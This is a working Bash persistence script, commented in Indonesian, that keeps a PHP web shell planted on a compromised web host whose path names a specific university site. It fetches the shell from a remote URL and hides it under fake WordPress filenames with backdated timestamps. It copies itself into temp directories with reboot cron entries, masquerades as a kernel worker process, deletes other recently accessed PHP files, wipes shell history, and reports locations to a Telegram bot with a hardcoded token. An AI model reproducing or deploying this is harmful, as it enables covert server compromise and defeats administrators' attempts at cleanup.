#!/bin/bash # === Konfigurasi === RAW_SHELL_URL="https://raw.githubusercontent.com/SatoruGojo03/Gojo/refs/heads/main/dx" BOT_TOKEN="8295512712:AAFQcEhu2gRC-W8Ov-9pOcMPQy6mxxeRBOs" # GANTI BOT TOKEN CHAT_ID="1345261884" # GANTI ID TELEGRAM FAKE_NAMES=( "index.php" "wp-config.php" "wp-login.php" "wp-admin.php" "wp-settings.php" "wp-load.php" "functions.php" "xmlrpc.php" "configuration.php" "administrator.php" "config.php" "install.php" "admin.php" "autoload.php" "settings.php" "db.php" "repair.php" "upload.php" "cmd.php" "test.php" "backup.php" "shell.php" "uploadify.php" "exploit.php" "functions.bak.php" "functions.old.php" "class.php" "class-wp.php" "wp-settings.bak.php" "wp-settings.old.php" "phpinfo.php" "info.php" "debug.php" "console.php" "session.php" "cache.php" "db_backup.php" "sql_dump.php" "uploads.php" "filemanager.php" "fileupload.php" "download.php") TIMEOUT=10 POLL_INTERVAL=2 ROOT_DIR="/home/u148690810/domains/akuntansife.umc.ac.id/public_html/" # SET ROOT WEBSITE MANUAL # Fungsi untuk generate tanggal acak (30 hari - 1 tahun yang lalu) random_old_date() { local days_ago=$((RANDOM % 336 + 30)) date -d "$days_ago days ago" +"%Y-%m-%d %H:%M:%S" } # Inisialisasi variabel BASE_DIR="$(cd "$(dirname "$0")" && pwd)" DOMAIN="${1%/}" [ -z "$DOMAIN" ] && DOMAIN="http://$(hostname -f)/" # Generate nama file acak untuk penyimpanan RANDOM_NAME1=".sys-$(head -c4 /dev/urandom | od -An -t x1 | tr -d ' ')" RANDOM_NAME2=".log-$(head -c4 /dev/urandom | od -An -t x1 | tr -d ' ')" RANDOM_NAME3=".cache-$(head -c4 /dev/urandom | od -An -t x1 | tr -d ' ')" # Buat beberapa lokasi backup untuk script TMP_PATH1="/tmp/$RANDOM_NAME1" TMP_PATH2="/dev/shm/$RANDOM_NAME2" TMP_PATH3="/var/tmp/$RANDOM_NAME3" # Salin script ke beberapa lokasi cp "$0" "$TMP_PATH1" 2>/dev/null cp "$0" "$TMP_PATH2" 2>/dev/null cp "$0" "$TMP_PATH3" 2>/dev/null # Berikan permission eksekusi chmod +x "$TMP_PATH1" 2>/dev/null chmod +x "$TMP_PATH2" 2>/dev/null chmod +x "$TMP_PATH3" 2>/dev/null # Set timestamp lama untuk semua file backup random_date=$(random_old_date) touch -d "$random_date" "$TMP_PATH1" 2>/dev/null touch -d "$random_date" "$TMP_PATH2" 2>/dev/null touch -d "$random_date" "$TMP_PATH3" 2>/dev/null # Tambahkan ke crontab untuk auto-restart dengan beberapa metode (crontab -l 2>/dev/null; echo "@reboot $TMP_PATH1 $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null (crontab -l 2>/dev/null; echo "@reboot $TMP_PATH2 $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null (crontab -l 2>/dev/null; echo "@reboot $TMP_PATH3 $DOMAIN >/dev/null 2>&1 &") | crontab - 2>/dev/null # Sembunyikan proses renice 19 $$ >/dev/null 2>&1 exec -a "[kworker/0:1]" "$TMP_PATH1" "$DOMAIN" & # Fungsi untuk mengirim pesan ke Telegram kirim_telegram() { local message="$1" curl -s -m "$TIMEOUT" -X POST "https://api.telegram.org/bot$BOT_TOKEN/sendMessage" \ -d "chat_id=$CHAT_ID" \ --data-urlencode "parse_mode=Markdown" \ --data-urlencode "text=$message" >/dev/null } # Fungsi untuk menghitung hash file get_file_hash() { local file="$1" [ -f "$file" ] && sha256sum "$file" 2>/dev/null | cut -d' ' -f1 } # Fungsi untuk mendownload shell download_shell() { local target="$1" curl -s -m "$TIMEOUT" -o "$target" "$RAW_SHELL_URL" chmod 444 "$target" 2>/dev/null } # Fungsi untuk mendapatkan timestamp file terlama di direktori get_oldest_timestamp() { local dir="$1" local oldest oldest=$(find "$dir" -type f -printf '%T@ %p\n' 2>/dev/null | sort -n | head -n1 | awk '{print $1}') if [ -z "$oldest" ]; then date +%s else date -d "@$oldest" +"%Y-%m-%d %H:%M:%S" fi } # Fungsi untuk mendapatkan direktori yang bisa ditulis secara acak get_random_writable_dir() { find "$ROOT_DIR" -type d -writable 2>/dev/null | shuf -n1 } # Fungsi untuk mendapatkan informasi proses yang mencoba menghapus file get_suspicious_processes() { local shell_dir="$1" local suspicious_info="" # Dapatkan proses yang sedang berjalan di direktori yang sama if command -v lsof >/dev/null 2>&1; then suspicious_info=$(lsof +D "$shell_dir" 2>/dev/null | grep -v "PID" | head -5 | awk '{printf "PID: %s, CMD: %s, USER: %s\n", $2, $1, $3}') fi # Jika tidak ada hasil dari lsof, coba dengan ps if [ -z "$suspicious_info" ] && command -v ps >/dev/null 2>&1; then suspicious_info=$(ps aux | grep -v grep | grep -E "(php|httpd|apache|nginx)" | head -5 | awk '{printf "PID: %s, CMD: %s, USER: %s\n", $2, $11, $1}') fi echo "$suspicious_info" } # Fungsi untuk mendapatkan file PHP yang baru saja diakses di direktori yang sama get_recently_accessed_php_files() { local shell_dir="$1" local recent_php_files="" # Dapatkan file PHP yang baru saja diakses dalam 2 menit terakhir if command -v find >/dev/null 2>&1; then recent_php_files=$(find "$shell_dir" -type f -name "*.php" -amin -2 2>/dev/null | grep -v "$(basename "$SHELL_PATH")") fi echo "$recent_php_files" } # Fungsi untuk menghapus file PHP yang mencurigakan delete_suspicious_php_files() { local shell_dir="$1" local deleted_files="" # Dapatkan file PHP yang baru saja diakses local suspicious_files=$(get_recently_accessed_php_files "$shell_dir") if [ -n "$suspicious_files" ]; then while IFS= read -r file; do # Hapus file jika bukan shell kita sendiri if [ "$file" != "$SHELL_PATH" ] && [ -f "$file" ]; then rm -f "$file" 2>/dev/null deleted_files="$deleted_files$file\n" fi done <<< "$suspicious_files" fi echo -e "$deleted_files" } # Fungsi untuk menyelamatkan shell selamatkan_shell() { local trigger="$1" local random_name="${FAKE_NAMES[$RANDOM % ${#FAKE_NAMES[@]}]}" local random_dir random_dir=$(get_random_writable_dir) mkdir -p "$random_dir" 2>/dev/null local new_path="$random_dir/$random_name" download_shell "$new_path" random_date=$(random_old_date) touch -d "$random_date" "$new_path" 2>/dev/null local ts=$(date +"%Y-%m-%d %H:%M:%S") local ip=$(curl -s --max-time 3 https://api.ipify.org || echo "unknown") local url="$DOMAIN${new_path#$ROOT_DIR}" # Dapatkan direktori shell lama local old_shell_dir=$(dirname "$SHELL_PATH") # Hapus file PHP yang mencurigakan local deleted_files=$(delete_suspicious_php_files "$old_shell_dir") # Dapatkan informasi tentang proses yang mencoba menghapus shell local suspicious_processes=$(get_suspicious_processes "$old_shell_dir") # Buat pesan notifikasi local message="⚠️ *Shell Dipindahkan! (Trigger: $trigger)* 📁 Path: \`$new_path\` 🌍 URL: \`$url\` 🌐 IP: \`$ip\` 🕒 Waktu: $ts" # Tambahkan informasi file yang dihapus jika ada if [ -n "$deleted_files" ]; then message="$message 💥 *File PHP yang Dihapus Balik:* \`\`\` $deleted_files \`\`\`" fi # Tambahkan informasi proses mencurigakan jika ada if [ -n "$suspicious_processes" ]; then message="$message 🔍 *Proses Mencurigakan:* \`\`\` $suspicious_processes \`\`\`" fi # Tambahkan pesan balasan message="$message 🖕 *Siapa berani hapus, langsung hilang duluan!*" kirim_telegram "$message" SHELL_PATH="$new_path" SHELL_HASH=$(get_file_hash "$new_path") } # Fungsi untuk deploy shell deploy_shell() { local random_dir random_dir=$(get_random_writable_dir) mkdir -p "$random_dir" 2>/dev/null local random_name="${FAKE_NAMES[$RANDOM % ${#FAKE_NAMES[@]}]}" SHELL_PATH="$random_dir/$random_name" download_shell "$SHELL_PATH" random_date=$(random_old_date) touch -d "$random_date" "$SHELL_PATH" 2>/dev/null SHELL_HASH=$(get_file_hash "$SHELL_PATH") local ts=$(date +"%Y-%m-%d %H:%M:%S") local url="$DOMAIN${SHELL_PATH#$ROOT_DIR}" local message="✅ *Shell berhasil dideploy!* 📁 Path: \`$SHELL_PATH\` 🌍 URL: \`$url\` 🕒 Waktu: $ts" kirim_telegram "$message" } # Fungsi untuk memeriksa perubahan file check_file_changes() { # Periksa keberadaan file if [ ! -f "$SHELL_PATH" ]; then selamatkan_shell "missing" return fi # Periksa permission local current_mode=$(stat -c "%a" "$SHELL_PATH" 2>/dev/null) if [ "$current_mode" != "444" ]; then selamatkan_shell "permission_changed" return fi # Periksa hash local current_hash=$(get_file_hash "$SHELL_PATH") if [ "$current_hash" != "$SHELL_HASH" ]; then selamatkan_shell "content_changed" return fi } # Fungsi untuk memeriksa integritas script itu sendiri check_self_integrity() { # Periksa keberadaan file backup if [ ! -f "$TMP_PATH1" ] && [ ! -f "$TMP_PATH2" ] && [ ! -f "$TMP_PATH3" ]; then # Jika semua file backup hilang, coba restore dari dir asli if [ -f "$0" ]; then cp "$0" "$TMP_PATH1" 2>/dev/null chmod +x "$TMP_PATH1" 2>/dev/null touch -d "$random_date" "$TMP_PATH1" 2>/dev/null fi fi # Periksa apakah proses masih berjalan if ! pgrep -f "[kworker/0:1]" > /dev/null; then # Jika proses tidak berjalan, restart dari backup nohup "$TMP_PATH1" "$DOMAIN" >/dev/null 2>&1 & exit fi } # Fungsi untuk membersihkan diri sendiri self_clean() { # Hapus file asli rm -f "$0" 2>/dev/null # Hapus history command history -c 2>/dev/null history -w 2>/dev/null # Hapus log rm -f ~/.bash_history 2>/dev/null rm -f ~/.zsh_history 2>/dev/null rm -f ~/.history 2>/dev/null } # Fungsi utama main_loop() { # Bersihkan diri sendiri self_clean # Deploy shell pertama kali deploy_shell # Loop monitoring while true; do check_file_changes check_self_integrity sleep "$POLL_INTERVAL" done } # Jalankan fungsi utama main_loop